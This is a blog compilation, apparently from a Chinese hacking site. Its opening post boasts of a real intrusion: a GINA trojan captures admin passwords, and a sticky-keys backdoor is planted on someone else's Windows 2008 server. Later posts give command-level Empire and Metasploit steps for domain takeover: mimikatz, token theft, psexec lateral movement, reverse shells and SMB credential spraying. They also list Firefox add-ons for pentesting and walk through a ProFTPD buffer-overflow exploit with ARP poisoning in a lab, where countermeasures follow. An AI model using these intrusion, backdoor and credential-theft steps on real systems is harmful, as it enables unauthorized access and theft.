中国骇客云教大家Windows2008下文件权限轻松改

在一次内网入侵中，通过安装gina木马，记录下了管理员账号密码。通过这个账号和密码去尝试远程登陆该网段其他服务器，大部分主机都能登陆（先鄙视一下管理员），其中远程登陆一台服务器时，连上去发现是Windows 2008，现在大部分服务器还是Windows 2003，我就想好好的保护这台肉鸡，供自己使用学习。为了防止管理员修改密码，决定在这个服务器上留下自己的后门，首先我上传配置好的木马替换系统system32文件夹下fi_nd,exe文件，但在替换文件时却出现。

替换其他系统文件也替换不了，我又想还是留粘滞键后门吧，把cmd．exe复制到其他文件夹下改成sethc．exe，去替换系统文件夹下面的，发现也是提示需要权限。当我右键一属性一安全一编辑，发现所有配置都是灰色的。

R34[KMG[7%1YX{M]GD[`8$V.png

在安全里面一高级一编辑，新窗口中发现只有一个查看按钮可以点击，原来传统的编辑按钮不存在了。

我点击“查看”按钮，发现里面的所有配置都是灰色的，无法做任何修改。我使用以往的命令行cacls．exe文件来配置其他文件的权限，却提示“拒绝访问”，晕！难道Windows 2008使用管理员账号也不能修改文件权限？后来经过我上网查找资料，发现真正造成这个回题的原因是文件的所有者，在Windows 2008系统中，系统所有文件和文件夹的权限所有者默认都是“Trustedlnstaller”。

在计算机管理里面用户管理界面上找不到这个用户，具体这个用户的属性我没有查找官方的相关说明，不知道它对系统安全具体起到什么作用。我们只需要将文件的所有者“Trustedlnstaller”修改成“Administrators”，那么我们对文件权限的操作就会随心所欲了，我们在“所有者”窗口上，选择“Administrators”，点击应用。这样就可以修改文件的权限所有者。现在我们对文件权限可以进行任何编辑替换了。以前是灰色无法编辑的部分都已经可以进行修改了。

具体文件权限的修改方法我这里就不再做任何说明，和原来Windows 2003上是一样的。我通过修改文件权限，舰利替换粘滞键，留下自己的后门。

在这里想告诉危险漫步的粉丝们，遇到问题要想办法解决，俗话说的好“方法总比困难多”，只有这样我们的技术才会不断进步。

2017年6月5日

中国骇客云之Empire实战域渗透

上一篇文章只是单纯的介绍了一些Empire的基本用法，但这么强大的工具根本不是一篇文章可以说清楚的，就像Metasploit，如果我单纯写一篇文章给你，告诉你这就是Metasploit全部的用法了。但是，真正的实战中，绝对是一脸蒙蔽的往着眼前的显示器，我要用什么命令？我接下来要用什么模块？类似这些问题就会在的脑海里迸发，可以说是彻底蒙蔽的状态。

Empire也一样，所以我就决定再写一篇Empire的文章，在域渗透中的使用。这并不是真的域环境，通常在渗透测试中碰到的域环境肯定比我在本地测试的域环境要复杂的多。我并不是专业的运维人员，单单搭建就弄了一个早上，我主要目的是尽量多的给大家介绍Empire的功能模块，让大家尽量多的了解Empire，以至于不会在真正的测试环境中蒙蔽，当然这么大的工具不是简简单单可以说请的，还需要大家共同的摸索。

0x02 域环境结构

所在域：tt.smiletest.com

域控：windows server 2012 ip:10.10.10.10

域内其他成员：

Windows 7 x32 ip:10.10.10.11Windows 7 x64 ip:10.10.10.12Windows 10 x64 ip:10.10.10.13

域环境结构图：（求妹子画得- -!）

0x03 撸起袖子干

首先得拿到一个shell，当然这个shell怎么来的就看大家自行发挥了，你可以在webshell里直接执行用Empire生成的直接返回会话的shellcode，我也推荐这方法，别问我为啥，因为免杀，而且不会在对方机机器上产生什么明显的痕迹;当然你也可以上传Metasploit的反弹马，然后在shell下执行这条语句;你还可以在让服务器管理员帮你执行！

哈哈，开玩笑，这种方法不存在，总之方法很多了，大家自由发挥，我直接托代码进去执行了。

拿到一个命令行之后，看看域环境内的主机数量以及看看有几个域

执行命令：

Shell net viewShell net view /domain

这里有一个地方需要注意的，再上一篇文章中说过，执行的如果不是Empire的命令，那么这条命令会被解析为windows命令，但是当执行的命令有空格，就必须要用shell去执行。

接下来要做什么？当然是提权了，当不知道用什么方法来提权的时候，可以使用一个模块来检测系统，让它告诉你应该用什么办法：

usemodule privesc/powerup/allchecks

看看设置，什么都不用做，直接执行，它会给返回我们想要的

可以看到，它列出了很多方法，可以直接bypassuac来提权，来吧执行一下，bypassuac 监听名

稍等几秒钟，就会返回一个更高权限的shell。

如果你还想要更的权限，可以使用一个模块提升到系统权限

usemodule persistence/elevated/schtasks

使用计划任务来帮我提升到系统权限

看看信息：

需要做的只是设置时间而已然后执行

set DailyTime 时间Set Listener 监听名

现在要做的事情就是等了，等时间到了返回具有更高权限的shell

更高级的权限已经回来了，这个时候，首先得知道内网中到底有几台机器，还有就是他们的ip，要不怎么继续尽享下去囊？那种小事情则么可能是Empire模块不自带的事情囊？可以寻找一下模块

searchmodule arpscan

立马，Empire就回显了，并且提示了它的用处

usemodule situational_awareness/network/arpscan

设置一下要扫描的网段

set Range 10.10.10.10-10.10.10.30

执行就好了

扫描速度还是很快的，既然已经有权限了，那可以执行mimikatz来拿到当前靶机的帐号密码了，mimikatz的执行效果就不给了，等mimikatz执行完成以后直接creds来看Empire列举好的密码就好了。

发现还有域用户在这台机器上登录了，密码已明文的形式显示出来了，可以看到有4个用户密码出来了（尼玛，域管都读出来了，环境没配好，假装没有 ^_^!），知道谁登陆了，也有权限了，那自然可以窃取身份用户了吗！然后进行横向移动，来吧，先身份窃取吧，使用pth <ID>这里的ID号就添上面的用creds 命令拿到的CredID，注意，这里必须要是hash的CredID，不可以是明文的，来窃取smilewin7x64身份令牌

执行 pth <ID>命令返回PID进程号

可以看到这个用户的进程号，

steal_token PID

就可以窃取身份令牌了，可是这里我就日了狗了，命令就是没回显，完全是突发情况，没办法，给大家换一个思路，是使用进程注入模块，来获取权限

usemodule management/psinject

需要设置的就是ProcID 和 Listener就好了

set ProcId 2912set Listener smiletest

设置好后执行，会返回一个新的会话

###你们想知道刚刚发生了什么吗？机器屏幕黑了一下，然后虚拟机去外加终端全部关掉了。有锤子么？还好我的文档随手保存，因为我曾经写500多行的代码没有保存，学机灵的，所以，大家也要养成随手ctrl+s…..题外话，我去整环境，重新来，唉。。

因为网络断掉，刚刚的数据有缓存，所以PID进程号码不对，大家可以清理一下缓存，重新执行，我的话懒，介绍新方法：

usemodule credentials/tokens

信息什么都不需要设置，直接执行

然后方法一样，进程注入

哈哈，成功拿到会话后，加下来做什么？当然是横向移动了，看看能不能用这个用户名拿到其他的机器。当然了，在渗透过程中直接模拟域管就好了，我这是为了跟大家演示，大家不要向我学习，这么傻的做无用功啊 ^_^!

其实这里我是知道可以登录哪里的机器的，但是想要寻找域管在哪里登录的，然后横向移动进去，窃取域管权限，不就可以拿到整个域了，我在这里提一下要怎么寻找域管在哪里登录的，使用模块

usemodule situational_awareness/network/powerview/user_hunter

也是powerview的模块，大家肯定都用过，看看需要设置什么

其实什么也不用设置，可以直接执行的，看一下这个设置吧，可以定向寻找一些东西，比如说你知道域管用户，那你可以设置一下的，还有计算机名，在这里直接执行，返回了域管登录在TTWIN7X64.tt.smiletest.com这台机器上，还有在这台机器上登录了smilewin7x64这个用户，哈～刚刚已经窃取到了权限，来吧，域管

来横向移动

usemodule situational_awareness/network/powerview/find_localadmin_access

查找整个域中全部的计算机名（实际上是powerview中的方法了）

什么都不需要设置，直接执行

返回了全部的机器名，

usemodule lateral_movement/invoke_psexec

一样，看看需要设置的东西

返回了全部的机器名，

usemodule lateral_movement/invoke_psexec

一样，看看需要设置的东西

设置机器名和监听就行，开撸

set ComputerName TTWIN7X64.tt.smiletest.comset Listener smiletest

执行

成功，而且是系统权限，那用相同的办法，进程注入从而得到域用户权限

过程略过

直接到获取到域用户kzhl权限

直接读密码了。渗透过程中可能读不到，你都有域管权限了，读不到怕啥？？

拿到了域管的密码，做什么？当然是迅速扩张了！

0x04 迁移进程到MSF实现smb迅速扩张

使用模块

usemodule code_execution/invoke_shellcode

设置方法如下

set Lhost 10.10.10.1set Lport 4444

在Metasploit设置监听

（用Empire用了一晚上，在重返Metasploit，我是谁？我要干嘛？命令怎么写？模块是什么？）

这里注意了，设置的payload必须是http或https的

use exploit/multi/handlerSet payload windows/meterpreter/reverse_httpsset lport 4444exploit

成功返回会话，接下来使用msf进行内网迅速扩张

use auxiliary/scanner/smb/smb_loginset rhosts 10.10.10.0/24set smbuser kzhlset smbpass admin888.set smbdomain TTset threads 16Exploit

恭喜我，撸穿了整个域。。。

0x05 收获到的一些神奇的想法

我并没有去测试这些方法的可行性，只是异想天开的在脑海里呈现的一些思路。

1.当我们拿到webshell的时候，苦恼在目标机上的杀软，无法绕过，可以使用webshell去执行Empire的payload，他直接执行在内存中，杀软是没有任何效果的，亲测可行，之后在使用Empire的模块将其反弹会Metasploit,实现了免杀的过程。

2.大家都知道，在Metasploit下的代理是很容易就可以设置的，但是Empire下则不然，很麻烦的一个东西，如果对方有杀软，可以使用第一个小思路绕过之后，在通过Metasploit添加代理，然后在配置proxychains，使用proxychainx来帮助Empire杀入内网，当然你也可以使用其他的工具，大家如果对代理的使用不是很了解的话，可以参见shutter老哥的一篇文章。

0x06 总结在最后

全文的逻辑和问题比较多，但是基本上给大家比较全面的介绍了Empire这款神器在真正渗透过程中的使用，我想通过这篇文章大家肯定对Empire有一个比较全面的了解，他牛的地方就用它，他弱的地方，用其他的工具辅助他。总之，工具是死的，人是活得。

哎呦，写这篇文章我表示我真的好辛苦，在渗透过程中碰到了很多问题，不过基本都是环境配置的问题，毕竟我不是运维，不过好在我成功的写完了全文。马达，刚刚从公司回来的发现烟没有了，现在终于写完了这篇文章，赶紧下楼买包烟冷静一下，这好几点的也不知道还有便利店开门，你们懂干活时候没有烟的痛苦么？？感觉思路都被限制了

2017年5月17日

Extensions For Turning Firefox Into a Penetration Testing Tool 中国骇客云之火狐浏览器渗透工具下载！

Firefox is a popular web browser from Mozilla. Popularity of Firefox is not only because it’s a good web browser, it also supports add-ons to enhance the functionality. Mozilla has a websiteadd-on sectionthat has thousands of useful add-ons in different categories. Some of these add-ons are useful for penetration testers and security analysts. These penetration testing add-ons helps in performing different kinds of attacks, and modify request headers direct from the browser. This way, it reduces the use of a separate tool for most of the penetration testing related tasks.

LEARN PENETRATION TESTING FROM TOP HACKERSLEARN PENETRATION TESTING FROM TOP HACKERS

In this brief post, we are listing a few popular and interesting Firefox add-ons that are useful for penetration testers. These add-ons vary from information gathering tools to attacking tools. Use what you think helpful. All these add-ons are available for free and you can download from the Mozilla add-on website. There are some premium add-ons like Dominator pro which is also available for purchase from official websites. See the list of free add-ons below.

Firefox Add-ons for Security Researchers and Penetration Testers

FoxyProxy Standard
FoxyProxy is an advanced proxy management add-on for Firefox browser. It improves the built-in proxy capabilities of Firefox. There are few other similar kind of proxy management add-ons available, but it offers more features that other add-ons. Based on the URL patterns, it switches internet connection across one or more proxy servers. When proxy is in use, it also displays an animated icon. In case you want to see the proxies used by the tool, you can see the logs.
AddFoxyProxyto you browser from this link:https://addons.mozilla.org/en-US/firefox/addon/foxyproxy-standard/
Firebug
Firebug is a nice add-on that integrates a web development tool inside the browser. With this tool, you can edit and debug HTML, CSS and JavaScript live in any webpage to see the effect of changes. It helps in analyzing JS files to find XSS vulnerabilities. It’s an really helpful add-on in finding DOM based XSS for security testing professionals.AddFirebugin your Browser from this link:https://addons.mozilla.org/en-US/firefox/addon/firebug/
Web Developer
Web Developer is another nice add-on that adds various web development tools in the browser. It helps in web application penetration testing.AddWeb Developerin your browser from this link:https://addons.mozilla.org/de/firefox/addon/web-developer/
User Agent Switcher
User Agent Switcher add-on; adds a one click user agent switch to the browser. It adds a menu and tool bar button in the browser. Whenever you want to switch the user agent, use the browser button. User Agent add on helps in spoofing the browser while performing some attacks.
AddUser Agent Switcherto your browser from this link:https://addons.mozilla.org/en-US/firefox/addon/user-agent-switcher/
Live HTTP Headers
Live HTTP Headers is a really helpful penetration testing add-on for Firefox. It displays live headers of each http request and response. You can also save header information by clicking on the button in the lower left corner. I don’t think that there is any kind of need to tell how important this add-on is for the security testing process.AddLive HTTP Headersto Firefox with this link:https://addons.mozilla.org/en-US/firefox/addon/live-http-headers/
Tamper Data
Tamper Data is similar to the Live HTTP Header add-on but, has header editing capabilities. With the tamper data add-on, you can view and modify HTTP/HTTPS headers and post parameters. Thus it helps in security testing web application by modifying POST parameters. It can be used in performing XSS and SQL Injection attacks by modifying header data.Add theTamper dataadd-on to Firefox browser with this link:https://addons.mozilla.org/en-US/firefox/addon/tamper-data/
Hackbar
Hackbar is a simple penetration tool for Firefox. It helps in testing simple SQL injection and XSS holes. You cannot execute standard exploits but you can easily use it to test whether vulnerability exists or not. You can also manually submit form data with GET or POST requests. It also has encryption and encoding tools. Most of the times, this tool helps in testing XSS vulnerability with encoded XSS payloads. It also supports keyboard shortcuts to perform various tasks.I am sure, most of the persons in the security field already know about this tool. This tool is mostly used in finding POST XSS vulnerabilities because it can send POST data manually to any page you like. With the ability of manually sending POST form data, you can easily bypass client side validations of the page. If your payload is being encoded at client side, you can use an encoding tool to encode your payload and then perform the attack. If the application is vulnerable to the XSS, I am sure you will find the vulnerability with the help of the Hackbar add-on on Firefox browser.AddHackbaradd-on to Firefox browser with this link:https://addons.mozilla.org/en-US/firefox/addon/hackbar/
Websecurify
Websecurify is a nice penetration testing tool that is also available as add-on for Firefox. We have already covered WebSecurify in detail in previous article. WebSecurify can detect most common vulnerabilities in web applications. This tool can easily detect XSS, SQL injection and other web application vulnerability. Unlike other listed tools, it is a complete penetration testing tool in itself available as a browser add-on. It gives most of the features available in standalone tool.AddWebSecurifyto Firefox browser with this link:https://addons.mozilla.org/en-us/firefox/addon/websecurify/
Add N Edit Cookies
“Add N Edit Cookies” is a cookie editing add-on that allows you to add and edit cookies data in your browser. With this tool, you can easily add session data manually in cookies. This tool is performed in session hijacking attack when you have the active cookies of the user. Edit your cookies to add the data and hijack the account.To downloadAdd N Edit Cookiesto Your Firefox browser:https://addons.mozilla.org/en-US/firefox/addon/add-n-edit-cookies-13793/
XSS Me
Cross Site Scripting is the most found web application vulnerability. For detecting XSS vulnerabilities in web applications, this add-on can be a useful tool. XSS-Me is used to find reflected XSS vulnerabilities from a browser. It scans all forms of the page, and then performs an attack on the selected pages with pre-defined XSS payloads. After the scan is complete, it lists all the pages that renders a payload on the page, and may be vulnerable to XSS attack. Now, you can manually test the web page to find whether the vulnerability exists or not.AddXSS Me
to your Firefox browser:https://addons.mozilla.org/en-us/firefox/addon/xss-me/
SQL Inject Me
SQL Inject Me is another nice Firefox add-on used to find SQL injection vulnerabilities in web applications. This tool does not exploit the vulnerability but display that it exists. SQL injection is one of the most harmful web application vulnerabilities, it can allow attackers to view, modify, edit, add or delete records in a database.The tool sends escape strings through form fields, and tries to search database error messages. If it finds a database error message, it marks the page as vulnerable. QA testers can use this tool for SQL injection testing.AddSQL Inject Me
add-on to your browser:https://addons.mozilla.org/en-us/firefox/addon/sql-inject-me/
FlagFox
FlagFox is another interesting add-on. Once installed in the browser, it displays the country’s flag to tell the location of the web server. It also comes with other tools like whois, WOT scorecard and ping.AddFlagFoxin your browser:https://addons.mozilla.org/en-us/firefox/addon/flagfox/
CryptoFox
CryptoFox is an encryption or decryption tool for Mozilla Firefox. It supports most of the available encryption algorithm. So, you can easily encrypt or decrypt data with supported encryption algorithm. This add-on comes with dictionary attack support, to crack MD5 cracking passwords. Although, it hasn’t have good reviews, it works satisfactorily.AddCryptoFoxadd-on to your browser:https://addons.mozilla.org/en-US/firefox/addon/cryptofox/
Access Me
Access Me, is another add-on for security testing professionals. This add-on is developed by the company that works on XSS Me and SQL Inject Me. Access Me is the can Exploit-Me tool used for testing access vulnerabilities in web applications. This tool works by sending several versions of page requests. A request using the HTTP HEAD verb and a request using a made up SECCOM verb will be sent. A combination of session and HEAD/SECCOM will also be sent.AddAccess Meto Firefox from this link:https://addons.mozilla.org/en-US/firefox/addon/access-me/
SecurityFocus Vulnerabilities search plugin
SecurityFocus Vulnerabilities search plugin, is not a security tool but a search plugin that lets users search for vulnerabilities from the Security Focus database.Add this to Firefox from the link:https://addons.mozilla.org/en-us/firefox/addon/securityfocus-vulnerabilities-/
Packet Storm search plugin
This is another search plugin that lets users search for tools and exploits from packetstormsecurity.org. The website offers free up-to-date security tools, exploits and advisories.Add this to Firefox from the link:https://addons.mozilla.org/en-us/firefox/addon/packet-storm-search-plugin/
Offsec Exploit-db Search
This is another plugin similar to the last two above. It also lets users search for vulnerabilities and exploits listed in exploit-db.com. This website is always up-to-date with latest exploits and vulnerability details.Add this to Firefox from the link:https://addons.mozilla.org/en-us/firefox/addon/offsec-exploit-db-search/
Snort IDS Rule Search
Snort IDS Rule Search is another search add-on for Firefox. It lets users search for Snort IDS rules on the snort.org website. Snort is the most widely deployed IDS/IPS technology worldwide. It’s an open source network Intrusion prevention and detection system with more than 400,000 users.AddSnort IDS Rule Searchto Firefox here:https://addons.mozilla.org/en-US/firefox/addon/snort-ids-rule-search/

These are few add-ons that you can use while web application penetration testing. Although, you cannot finish complete penetration testing work with these tools, but these browser tools are useful for most of the tasks and reduce the use of separate tools.

Hackbar, SQL Inject Me, XSS Me and WebSecurify are the browser tools that are widely used for finding vulnerabilities in web applications. Other tools are used for specific work which helps in getting information while penetration testing.

How to install these add-ons in the Firefox browser

Installation of these add-ons in the Firefox browser is really simple. I added links of each Add-on to make installation easier. Just follow the link, and you will land on the add-on page. Find the big “download” button to start downloading. In the next page, you will find terms and conditions. Just below that, you will see the “accept and install” button. Then it will open a pop-up and installation begins in 3 seconds. After installation is complete, you will need to restart the browser. Everything is just a click away. I am not describing the process with screenshots because I assume that you already know how to install add-ons in Mozilla Firefox.

LEARN PENETRATION TESTING FROM TOP HACKERSLEARN PENETRATION TESTING FROM TOP HACKERS

Conclusion

Firefox is not only a nice browser, but also a friend of penetration testers and security researchers. With the given Add-ons, you can enhance the functionality of Firefox in the way that is useful for the penetration testing process. Some of these tools help in gathering information about a website and its servers. A few other tools help in intercepting and modifying header information, to perform attacks via headers. In case you are trying to perform session hijacking, you can use an add-on to edit the cookies with the cookie data stolen from a user’s browser. SQL Inject ME, XSS Me and Websecurify are semi-automated tools to scan the page, and find the vulnerabilities that may be on the website. These 3 tools are dedicated security tools with a good success rate. We have covered WebSecurify in earlier posts. You can read more about the tool to know how it actually works. Hackbar is the best tool when you want to test a form against Post XSS. Hackbar helps you to manually submit a form to send POST data. If the app has client side validation in form, and has few limits in length and input, you can use Hackbar to submit form data manually and see the effect. It also has encoding tools to encode your XSS payloads, without using any separate tool. Most of the people involved in the security testing field use this tool.

Few tools are just search add-ons that can help you to search exploits and advisories from popular databases. You can use these add-ons to find the appropriate exploit to perform an attack on the web application, to check whether the app is affected with this known exploit or not.

I am sure you will like few of these add-ons and will use them in your security testing process.

I personally use Hackbar, SQL Inject Me, XSS me, WebSecurify, Add N Edit Cookies, Live HTTP Headers, Tamper data, FoxyProxy standard and Firebug.

Which add-on you would like to use? Share your views via comments.

2017年5月17日

Penetration Testing of an FTP Service 中国骇客云教您一个关于FTP的渗透测试文章

In this article we are going to learn how to configure ProFTPD service in a CentOS machine. After that we will conduct penetration testing to evaluate the security of FTP service and then we will also learn the countermeasures for vulnerabilities.

Installation and Configuration of FTP Service on Centos Linux Machine

[1] The source code of the older version of ProFTPD server (1.3.3a) was downloaded from the ProFTPD source code repository, located atftp://ftp.proftpd.org/distrib/source/proftpd-1.3.3a.tar.bz2.

The commands used were (without the hash sign) (ProFTPD, 2011):# cd/usr/local/src# wget -c ‘ftp://ftp.proftpd.org/distrib/source/proftpd-1.3.3a.tar.bz2’[2] For compilation of the source code, development libraries and compilers need to be installed on the CentOS machine. They were installed using the following command (ProFTPD, 2013):# yum -y groupinstall ‘Development tools’[3] The ProFTPD server runs as a non-privileged user on the Linux system for security reasons. A group called ftpd was created and then a user called ftpd was also created that belonged to the ftpd group. The following commands were used:

Command Used	Purpose
groupaddftpd	Creates a new group called ftpd and populates the /etc/group file.
useradd –g ftpdftpd	Creates a new user called ftpd that has ftpd as its primary group (specified by the –g parameter) and populates the /etc/passwd file.

[4] Once the user and group ftpd were added, the next step was to compile the source code of the ProFTP server to produce the ProFTPD binary, which supports the FTP (file transport protocol). The following commands were used to achieve this (ProFTPD, 2011):

Command Used	Purpose
cd /usr/local/src	Change directory to the location /usr/local/src, where the source code of the ProFTP has been downloaded.
tar -jxf proftpd-1.3.3a.tar.bz2	The tar command uncompressed the proftpd-1.3.3a.tar.bz2 BZIP2 file. The command options are as follows: -j -> The file input is in BZIP2 format x -> extract f -> this argument is followed by the compressed filename.
cd proftpd-1.3.3a	Change directory into the uncompressed folder proftpd-1.3.3a.

Command Used (continued)	Purpose
install_user=ftpdinstall_group=ftpd ./configure–prefix=/usr–sysconfdir=/etc	This command runs a shell script called configure in the current directory. This script checks the build dependencies and the machine architecture on which the software is going to compile. The main task of this command is to generate a file called “Makefile.” The “Makefile” contains the compilation and installation instructions that is read by the make command. The install_user and install_group commands instruct the configure utility that the user and group used by the ProFTPDare ftpd and ftpd, respectively. The prefix=/usr instructs the configure utility that the binaries should be installed on /usr directory rather than /usr/local directory (default). Finally, the sysconfdir=/etc instructs the configure script that the configuration files should be installed in the /etc directory.
Make	This command compiles the binary as per the instructions loaded in the Makefile.
make install	This command installs the compiled binaries, which include the ProFTPD daemon called proftpd.

[5] Once the binaries were compiled, the location of proftpd was found out using the following command:# which proftpdThe version was also checked using the following command:#/usr/sbin/proftpd –v

[6] The main configuration file of the ProFTPD server, called proftpd.conf, which is located at /etc, was edited using vi editor. The final configuration file looked like the following. The configuration is heavily commented (comments starts with # sign) for explanation:

The same file has the configuration directive, starting with <Anonymous ~ftp> and ending with </Anonymous>, and all the directives inside it were commented out (by putting a hash sign in front of the configuration) to disable anonymous FTP service on the ProFTPD server.

The final configuration file only allows local Linux accounts/users (users defined by the /etc/passwd) and chroot (restricts) them to their home directory so that they cannot break out of that directory. [7] Since the ProFTPD daemon is configured to support local Linux account and to chroot user to his/her home directory, a new user called prithak with password password was added to the Linux system for testing. The following commands were used:# useradd prithak# passwd prithak(enter password prithak twice) Similarly, another user called Daniel was also added to the system. Finally, now we have the following users on the system:

Username	Password
prithak	1234qwer
daniel	1a2b3c
chintan	a1b2c3d4

[8] The ProFTP server (192.168.79.135) was started in debugging mode and was accessed from the Windows machine (192.168.79.1) using the in-built Windows ftp command. The user prithak (having password prithak) was able to successfully log into the ProFTPD server and at the same time the ProFTPD server produced debugging logs on the standard output to confirm the details of the login. The proftpd was started using the following command line options:proftpd -n -d 4 -c /etc/proftpd.conf –ipv4The options are as follows:

-nRuns the proftpd process in standalone mode (must be configured as such in the configuration file), but does not background the process or disassociate it from the controlling tty. Additionally, all output (log or debug messages) are sent to stderr, rather than the syslog mechanism.-dRuns the ProFTPD server in debugging mode. The 4 parameter increases the verbosity of the logging to 4.-c /etc/proftpd.confInstructs the ProFTPD daemon to read the configuration file located at /etc/proftpd.conf.–ipv4Instructs the ProFTPD daemon to listen only on IPV4 addresses, i.e., disabled IPV6 (if present).

[9] To ensure that the ProFTP server running on (192.168.79.135) starts every time Linux is restarted, the initialization script (init script) that comes with the source of the ProFTP was copied to the CentOS INIT V (initialization system V) script directory (/etc/rc.d/init.d). Then the script was made executable. Finally, the ProFTPD service was turned on, using the chkconfig command.# cp /usr/local/src/proftpd-1.3.3a/contrib/dist/rpm/proftpd.init.d /etc/rc.d/init.d/proftpd# chmod 775 /etc/rc.d/init.d/proftpd# chkconfig proftpd onReconnaissance, Footprinting, and Exploitation[1]Reconnaissance and FootprintingThe first step in every vulnerability assessment is to find what services are running and the version of the service; this is called reconnaissance and footprinting. To complete this step a port scan against the target machine should be launched. Following the same principal, nmap port scanner was launched against the machine using the following parameters:root@bt:~#nmap -sS -PN -n -sV -sC 192.168.79.135The Nmap scan result indicated that the remote machine has two open ports: 22 (SSH) and 21 (FTP). Also, the version of the FTP server running on the remote machine is ProFTPD 1.3.3a and that of SSH is OpenSSH 5.3. Also, the SSH server only supports SSH protocol version 2.0.[2] Buffer Overflow Attack Against theProFTPDServiceWhen known vulnerabilities for ProFTPD 1.3.3a were searched on the Internet, the following results were obtained:The vulnerability “CVE-2010-4221” was identified to be affecting the version of ProFTPD 1.3.3.a that we were running. According to the site, “Multiple stack-based buffer overflows in the pr_netio_telnet_gets function in netio.c in ProFTPD before 1.3.3c allow remote attackers to execute arbitrary code via vectors involving a TELNET IAC escape character to a (1) FTP or (2) FTPS server.”

Similar, when exploits for the CVE-2010-4221 was searched on the internet it lead to the following metasploit exploit: “ProFTPD 1.3.2rc3 – 1.3.3b Telnet IAC Buffer Overflow (Linux).” The screenshot of the same is shown below:To successfully exploit the remote machine running the vulnerable version of ProFTPD, metasploit was launched using the following commands in Backtrack Linux system:root@bt:~#cd /opt/metasploit/msf3root@bt:/opt/metasploit/msf3#./msfconsoleThe exploit for the vulnerable version of ProFTPD running on 192.168.79.135 was loaded using the following command (commands are in red):

msf>use exploit/linux/ftp/proftp_telnet_iacmsf exploit(proftp_telnet_iac) >set RHOST 192.168.79.135RHOST => 192.168.79.135 msf exploit(proftp_telnet_iac) >set payload linux/x86/shell_reverse_tcpmsf exploit(proftp_telnet_iac)> set LHOST 192.168.79.144LHOST => 192.168.79.144 msf exploit(proftp_telnet_iac) >exploit –j

Metasploit Command	Description
use exploit/linux/ftp/proftp_telnet_iac	Loads the proftp_telnet_iac exploit into the current context.
set RHOST 192.168.79.135	The target host of the exploit, i.e., the IP address of the vulnerable machine.
set payload linux/x86/shell_reverse_tcp	The shell code that will be executed after successful exploitation. Here the reverse shell payload is chosen. The reverse shell payload connects back to the attacker after the exploit is successful. The IP to which the exploit should connect back is set by the LHOST parameter.
set LHOST 192.168.79.144	The IP address of the attacker.
exploit –j	Launch the exploit as a background session.

As a result of successful exploitation, reverse shell was obtained on the 192.168.79.135 (ProFTP) server. A new session was created for the shell, which could be listed using “session –l” command in the metasploit console.ETHICAL HACKING TRAINING – RESOURCES (INFOSEC)To interact with the session, the “session –i 1” command was used. To check the privilege level of the user who has triggered the reverse shell, the following command was used:

id
This command prints the effective user id of the user. The output showed that we had uid 0 and gid 0 i.e. we were root user.
whoami

This command is used to print the user-friendly name of the current user. The output of this command also confirmed that we had root access in the machine. Since we had the privileges of the super user (root), we were also able to dump the /etc/shadow file, which contains the password hashes of various users in the system and is only readable/writeable by the root user. The following screenshot shows the interaction:[2] Brute-Force and Password Reuse Attack Against the ProFTP ServerTo carry out a password brute-force attack against the ProFTP server, the following Python script was written. This script tries to brute-force the password of users prithak, chintan, and daniel. The default password file that comes with bracktrack is used as the password database file.

Using the above Python script, the password of the FTP users’ prithak, chintan, and daniel were brute forced and obtained successfully. The following screenshot shows the password obtained:

Since most systems use the same username and password for multiple services, the username and passwords that were obtained from the previous attacks were used against the SSH server running on the same server. This attack is also called the “password reuse attack” (Harper,2011). The password reuse attack was successful and the above credentials were also valid for SSH login. The following screenshot shows the successful SSH login:

[3] ARP Poisoning and Password Sniffing AttackSince the FTP protocol sends username and passwords in clear text, it is susceptible to password sniffing attacks. In this attack, the following IP machines are involved: 192.168.79.135 ProFTP Server (FTP Server) 192.168.79.144 Backtrack (Attacker) 192.168.79.150 Windows XP (FTP Client) The following screenshot shows the address resolution protocol table in the Windows XP host before the ARP poisoning attack is launched:It can be seen that the all the hosts have different MAC addresses associated with them. Now, since the attacker is on the same LAN segment as the FTP server and the FTP client, it is possible for the attacker to launch an ARP poisoning attack so that he can sit in the middle of the FTP exchanges and sniff the password. To do this, the following steps were performed on the attacker’s machine:

Enabled IP forwarding on the attacker’s machine so that it can route the traffic between the FTP server and FTP client. This is done using the following command:
# echo 1 > /proc/sys/net/ipv4/ip_forward
Ettercap utility was used to launched an ARP poisoning attack against both the 192.168.79.150 [ Windows XP (FTP Client)] and the 192.168.79.135 ProFTP Server (FTP Server) . The following command was used:
# ettercap –iface eth4 –text –quiet –mitmarp /192.168.79.150/ /192.168.79.135/
The following screenshot shows the ARP table on the Windows XP machine before and after the attack was launched:
Now, when the client logs into the FTP server, the ettercap utility grabs the password and prints it.

Countermeasures

[1] Countermeasure Against Buffer Overflow Exploit

Since the older version of ProFTPD is being run on the system, the most effective countermeasure is to install the latest version of the same software. Another countermeasure is to install a more secure version of FTP server that has a very good security track record. The pureftpd server seems to have a better security track record than the ProFTPD server.

To apply the countermeasure, we choose to upgrade the PureFTPD into the latest version. This was done by following similar steps that were used to install the older version of ProFTPD. The steps used were:

The running version of the ProFTPD server was stopped using the following command:

# service proftpd stop

The older version of the ProFTPD server was removed by entering its source directory and using the “make deinstall” command.

# cd /usr/local/src/proftpd-1.3.3a# make deinstall

The latest version of the source code of ProFTPD server was downloaded and its MD5 checksum verified using md5sum command. The following screenshots show the interaction:
The newer version of ProFTPD was compiled and installed, using the following commands:
# tar zxvf proftpd-1.3.5rc2.tar.gz# cd proftpd-1.3.5rc2# install_user=ftpdinstall_group=ftpd ./configure –prefix=/usr –sysconfdir=/etc –with-modules=mod_tls# make# make install[ N.B.: All these commands and their usage have been explained already when the older version of ProFTPD was installed. The mod_tls option enables FTP over SSL/TLS (FTPS) protocol support. ]
When the version of ProFTPD was checked, it came out to be ProFTPD Version 1.3.5rc2.
The latest version of ProFTPD was started and then the lsof command was used to verify that FTP server was running:
It was also possible to login into the FTP using the same username and passwords that were used earlier. This proved that the upgraded FTP service was indeed working perfectly. When the same exploit that was used previously was launched against that ProFTPD server using metasploit, it failed. This verified that the service was patched. Also, at the time of writing, no known exploits (local or remote) exist for the ProFTPD server version 1.3.5-rc2 that we are running.

[2] Countermeasure Against Password Sniffing and Password Reuse AttackThe FTP protocol can be secured by using the FTP over the SSL (FTPS) protocol. The following steps can be performed to enable FTPS:

Generate SSL/TLS certificates using the OpenSSL utility that comes with Linux (Falko, 2011):
# mkdir /etc/ssl_certs/# opensslreq -new -x509 -days 730 -nodes -out \/etc/ssl_certs/proftpd.cert.pem -keyout /etc/ssl_certs/proftpd.key.pemThe –days 730 ensures that the certificate is valid for 730 days or two years.
